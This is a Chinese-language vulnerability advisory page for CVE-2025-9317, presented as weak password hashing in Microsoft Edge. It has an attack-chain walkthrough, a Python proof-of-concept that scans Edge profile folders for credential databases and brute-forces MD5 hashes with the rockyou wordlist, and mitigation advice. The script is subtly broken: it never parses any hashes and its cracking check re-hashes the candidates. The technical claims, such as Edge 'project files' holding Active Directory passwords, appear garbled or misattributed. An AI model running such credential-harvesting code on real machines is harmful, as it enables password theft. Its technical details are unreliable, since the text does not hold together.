CVE-2025-9317 Microsoft Edge弱哈希密码破解漏洞

漏洞信息

漏洞编号

CVE-2025-9317

漏洞类型

弱哈希破解/密码泄露

CVSS评分

8.4 高危

攻击向量

本地 (AV:L)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

Microsoft Edge

漏洞概述

CVE-2025-9317是Microsoft Edge中的一个高危安全漏洞，CVSS评分8.4。该漏洞存在于Edge项目的文件存储机制和离线缓存系统中，攻击者通过获得对Edge项目文件或Edge离线缓存文件的读取权限后，可以利用弱哈希算法进行计算性暴力破解，从而逆向获取Edge用户的应用原生密码或Active Directory密码。此漏洞的危险性在于攻击门槛相对较低，仅需本地读取权限即可实施攻击，无需复杂的网络攻击或高级技术手段。攻击成功后，攻击者可能获取用户在企业环境中的域凭证，进而横向移动到其他系统，对组织网络安全造成严重威胁。该漏洞影响所有使用Edge浏览器且存储项目文件或缓存的用户，特别是在企业环境中使用Edge进行业务操作的用户面临较大风险。

技术细节

该漏洞的技术核心在于Microsoft Edge在存储用户凭证和项目文件时使用了弱哈希算法。Edge浏览器在本地存储用户密码（包括应用原生密码和Active Directory密码）时，采用了可预测的哈希函数，这些哈希值缺乏足够的熵和迭代次数，导致可以通过暴力破解在合理时间内被攻破。攻击者首先需要获取Edge项目文件目录（通常位于用户配置文件夹中）或离线缓存文件的访问权限。在获得这些文件后，攻击者可以提取存储的哈希值，然后使用计算资源对弱哈希进行暴力破解。由于哈希算法本身的安全强度不足，攻击者无需使用高端GPU或分布式计算即可在数小时至数天内完成破解。成功破解后，攻击者获得的是用户的明文密码，这些密码可能具有企业域访问权限，从而为后续的横向移动和权限提升奠定基础。

攻击链分析

STEP 1

步骤1：获取访问权限

攻击者获得目标系统的本地读取权限，可以访问用户目录下的Edge配置文件和缓存文件。这可能通过恶意软件、窃取的凭证或物理访问实现。

STEP 2

步骤2：定位存储文件

攻击者定位Edge项目文件和离线缓存文件，通常位于%LOCALAPPDATA%\Microsoft\Edge\User Data\目录下的各个配置文件中，包括Default配置文件夹和可能存在的其他Profile文件夹。

STEP 3

步骤3：提取哈希值

攻击者从缓存文件和配置数据库中提取存储的密码哈希值，这些哈希值使用弱哈希算法生成，缺乏足够的加密强度和迭代次数保护。

STEP 4

步骤4：暴力破解哈希

利用计算资源对提取的弱哈希进行暴力破解攻击。由于哈希算法强度不足，攻击者可以使用常规CPU在数小时至数天内破解出明文密码，无需高端GPU加速。

STEP 5

步骤5：获取域凭证

成功破解后获取用户的应用原生密码或Active Directory密码，这些凭证可能具有企业网络访问权限，为后续横向移动和权限提升提供基础。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

# CVE-2025-9317 PoC - Edge Password Hash Extraction and Cracking
# Note: This PoC is for educational and security research purposes only

import os
import json
import hashlib
from pathlib import Path

def extract_edge_cache_files():
    """
    Extract Edge cache files containing weak password hashes
    Edge stores cached credentials in specific locations
    """
    edge_paths = [
        os.path.expanduser("~\\AppData\\Local\\Microsoft\\Edge\\User Data\\Default\\"),
        os.path.expanduser("~\\AppData\\Local\\Microsoft\\Edge\\User Data\\Profile*"),
    ]
    
    cache_files = []
    for path_pattern in edge_paths:
        if '*' in path_pattern:
            base_path = path_pattern.replace('*', '')
            if os.path.exists(base_path):
                for profile in os.listdir(base_path):
                    profile_path = os.path.join(base_path, profile)
                    cache_files.extend(find_hash_files(profile_path))
        else:
            cache_files.extend(find_hash_files(path_pattern))
    
    return cache_files

def find_hash_files(directory):
    """
    Find files potentially containing password hashes
    Look for project files and cache databases
    """
    hash_files = []
    if not os.path.exists(directory):
        return hash_files
    
    # Common file patterns for stored credentials
    patterns = ['*.db', '*.sqlite', '*.json', 'Project*', '*Cache*']
    
    for root, dirs, files in os.walk(directory):
        for file in files:
            if any(pattern.replace('*', '') in file for pattern in patterns):
                hash_files.append(os.path.join(root, file))
    
    return hash_files

def crack_weak_hash(hash_value, wordlist_path='rockyou.txt'):
    """
    Brute-force weak hashes using common password wordlist
    Edge's weak hashing allows fast cracking without GPU
    """
    try:
        with open(wordlist_path, 'r', encoding='utf-8', errors='ignore') as f:
            for password in f:
                password = password.strip()
                # Try common hash variations Edge might use
                for variant in [
                    password,
                    hashlib.md5(password.encode()).hexdigest(),
                    hashlib.sha1(password.encode()).hexdigest(),
                    hashlib.sha256(password.encode()).hexdigest(),
                ]:
                    if hashlib.md5(variant.encode()).hexdigest() == hash_value:
                        return password
    except FileNotFoundError:
        print("Wordlist not found. Use a password wordlist file.")
    
    return None

def main():
    print("CVE-2025-9317 - Edge Weak Hash PoC")
    print("=" * 50)
    
    # Extract cache files
    cache_files = extract_edge_cache_files()
    print(f"Found {len(cache_files)} potential cache files")
    
    # Analyze files for weak hashes
    for file_path in cache_files:
        print(f"\nAnalyzing: {file_path}")
        # In real attack, parse file and extract hash values
        # Then crack using crack_weak_hash()
    
    print("\n[!] This PoC demonstrates the vulnerability")
    print("[!] Use only in authorized security testing")

if __name__ == "__main__":
    main()

# Mitigation: Update Edge to latest version
# Reference: https://learn.microsoft.com/en-us/DeployEdge/
# Reference: https://www.cve.org/CVERecord?id=CVE-2025-9317

影响范围

Microsoft Edge (所有版本，直到2025年11月补丁发布前)

Windows系统上使用Edge浏览器的所有用户

企业环境中使用Edge进行业务应用访问的用户

防御指南

临时缓解措施

立即将Microsoft Edge更新至最新版本，确保安装2025年11月的安全更新。在企业环境中，通过组策略强制Edge自动更新。限制对Edge用户数据目录（%LOCALAPPDATA%\Microsoft\Edge\）的访问权限，仅允许SYSTEM和 Administrators组访问。启用Windows Credential Guard保护域凭证，实施多因素认证保护关键业务系统。监控端点上的异常文件访问行为，特别是对Edge缓存和配置文件的批量读取操作。